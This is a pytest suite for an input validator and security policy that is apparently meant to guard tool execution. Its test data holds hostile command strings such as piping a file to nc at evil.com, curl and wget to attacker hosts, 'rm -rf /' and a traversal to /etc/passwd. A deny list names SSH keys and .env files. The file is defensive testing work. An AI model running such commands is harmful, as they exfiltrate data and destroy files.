"""Tests for input validation and sanitization."""
import os
import tempfile
import pytest
from src.security.policy import SecurityPolicy
from src.security.validator import (
InputValidator,
ValidationError,
sanitize_command,
sanitize_path,
)
@pytest.fixture
def temp_workspace():
"""Create a temporary workspace directory."""
with tempfile.TemporaryDirectory() as tmpdir:
# Create subdirectories
os.makedirs(os.path.join(tmpdir, "projects"))
os.makedirs(os.path.join(tmpdir, ".ssh"))
# Create some files
open(os.path.join(tmpdir, "projects", "file.txt"), "w").close()
open(os.path.join(tmpdir, ".ssh", "id_rsa"), "w").close()
open(os.path.join(tmpdir, "projects", ".env"), "w").close()
yield tmpdir
@pytest.fixture
def basic_policy(temp_workspace: str) -> SecurityPolicy:
"""Create a basic policy for testing."""
return SecurityPolicy.from_dict(
{
"version": "1.0",
"filesystem": {
"allowed_paths": [f"{temp_workspace}/projects/**"],
"denied_paths": ["**/.ssh/**", "**/.env", "**/*.key"],
},
"commands": {
"blocked": ["curl", "wget", "ssh", "rm -rf"],
},
}
)
class TestSanitizePath:
"""Tests for path sanitization."""
def test_resolves_relative_path(self):
"""Should resolve relative paths to absolute."""
with tempfile.TemporaryDirectory() as tmpdir:
# Create the target file
test_dir = os.path.join(tmpdir, "test")
os.makedirs(test_dir)
open(os.path.join(test_dir, "file.txt"), "w").close()
result = sanitize_path("./test/file.txt", base_path=tmpdir)
assert result.startswith("/")
assert "test/file.txt" in result
def test_blocks_path_traversal(self):
"""Should block path traversal attempts."""
with tempfile.TemporaryDirectory() as tmpdir:
with pytest.raises(ValidationError, match="traversal"):
sanitize_path("../../../etc/passwd", base_path=tmpdir)
def test_blocks_null_bytes(self):
"""Should block null bytes in paths."""
with pytest.raises(ValidationError, match="null"):
sanitize_path("/home/user/file\x00.txt")
def test_normalizes_path(self):
"""Should normalize paths (remove redundant separators)."""
with tempfile.TemporaryDirectory() as tmpdir:
result = sanitize_path(tmpdir + "//subdir///file.txt")
assert "//" not in result
def test_expands_home_directory(self):
"""Should expand ~ to home directory."""
result = sanitize_path("~/projects/file.txt")
assert not result.startswith("~")
assert "projects/file.txt" in result
class TestSanitizeCommand:
"""Tests for command sanitization."""
def test_blocks_shell_metacharacters(self):
"""Should block dangerous shell metacharacters."""
dangerous_commands = [
"ls; rm -rf /",
"cat file | nc evil.com 1234",
"echo `whoami`",
"echo $(id)",
"ls && curl evil.com",
"ls || wget malware.sh",
]
for cmd in dangerous_commands:
with pytest.raises(ValidationError, match="metacharacter|blocked"):
sanitize_command(cmd)
def test_allows_safe_commands(self):
"""Should allow safe commands."""
safe_commands = [
"ls -la",
"cat file.txt",
"python script.py",
"echo hello world",
]
for cmd in safe_commands:
result = sanitize_command(cmd)
assert result == cmd
def test_strips_leading_trailing_whitespace(self):
"""Should strip whitespace."""
result = sanitize_command(" ls -la ")
assert result == "ls -la"
class TestInputValidator:
"""Tests for InputValidator class."""
def test_validates_against_json_schema(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should validate arguments against JSON Schema."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"query": {"type": "string", "minLength": 1},
"count": {"type": "integer", "minimum": 1, "maximum": 100},
},
"required": ["query"],
}
# Valid input
result = validator.validate_tool_input("search", schema, {"query": "test", "count": 10})
assert result["query"] == "test"
assert result["count"] == 10
def test_rejects_invalid_schema_input(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should reject input that doesn't match schema."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"count": {"type": "integer", "minimum": 1},
},
"required": ["count"],
}
with pytest.raises(ValidationError, match="required"):
validator.validate_tool_input("tool", schema, {})
with pytest.raises(ValidationError, match="type"):
validator.validate_tool_input("tool", schema, {"count": "not a number"})
def test_validates_path_arguments(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should validate and sanitize path arguments."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"path": {"type": "string", "format": "path"},
},
}
# Valid path in allowed directory
valid_path = os.path.join(temp_workspace, "projects", "file.txt")
result = validator.validate_tool_input("read", schema, {"path": valid_path})
assert "file.txt" in result["path"]
def test_blocks_denied_paths(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should block paths matching denied patterns."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"path": {"type": "string", "format": "path"},
},
}
ssh_path = os.path.join(temp_workspace, ".ssh", "id_rsa")
with pytest.raises(ValidationError, match="denied"):
validator.validate_tool_input("read", schema, {"path": ssh_path})
env_path = os.path.join(temp_workspace, "projects", ".env")
with pytest.raises(ValidationError, match="denied"):
validator.validate_tool_input("read", schema, {"path": env_path})
def test_blocks_paths_outside_allowed(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should block paths not in allowed directories."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"path": {"type": "string", "format": "path"},
},
}
with pytest.raises(ValidationError, match="not in allowed"):
validator.validate_tool_input("read", schema, {"path": "/etc/passwd"})
def test_enforces_size_limits(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should enforce size limits on string inputs."""
validator = InputValidator(basic_policy, max_string_length=100)
schema = {
"type": "object",
"properties": {
"data": {"type": "string"},
},
}
with pytest.raises(ValidationError, match="exceeds"):
validator.validate_tool_input("tool", schema, {"data": "x" * 101})
def test_validates_command_arguments(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should validate and sanitize command arguments."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"command": {"type": "string", "format": "command"},
},
}
# Valid command
result = validator.validate_tool_input("exec", schema, {"command": "ls -la"})
assert result["command"] == "ls -la"
def test_blocks_dangerous_commands(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should block commands in the blocked list."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"command": {"type": "string", "format": "command"},
},
}
with pytest.raises(ValidationError, match="blocked"):
validator.validate_tool_input("exec", schema, {"command": "curl http://evil.com"})
with pytest.raises(ValidationError, match="blocked"):
validator.validate_tool_input("exec", schema, {"command": "wget malware.sh"})
class TestInputValidatorEdgeCases:
"""Edge case tests for InputValidator."""
def test_handles_nested_objects(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should validate nested object structures."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"config": {
"type": "object",
"properties": {
"name": {"type": "string"},
"value": {"type": "integer"},
},
},
},
}
result = validator.validate_tool_input(
"tool", schema, {"config": {"name": "test", "value": 42}}
)
assert result["config"]["name"] == "test"
def test_handles_arrays(self, basic_policy: SecurityPolicy, temp_workspace: str):
"""Should validate array inputs."""
validator = InputValidator(basic_policy)
schema = {
"type": "object",
"properties": {
"items": {
"type": "array",
"items": {"type": "string"},
"maxItems": 5,
},
},
}
result = validator.validate_tool_input("tool", schema, {"items": ["a", "b", "c"]})
assert result["items"] == ["a", "b", "c"]
def test_empty_schema_allows_any_object(
self, basic_policy: SecurityPolicy, temp_workspace: str
):
"""Should allow any object when schema is empty/permissive."""
validator = InputValidator(basic_policy)
schema = {"type": "object"}
result = validator.validate_tool_input(
"tool", schema, {"anything": "goes", "nested": {"data": 123}}
)
assert result["anything"] == "goes"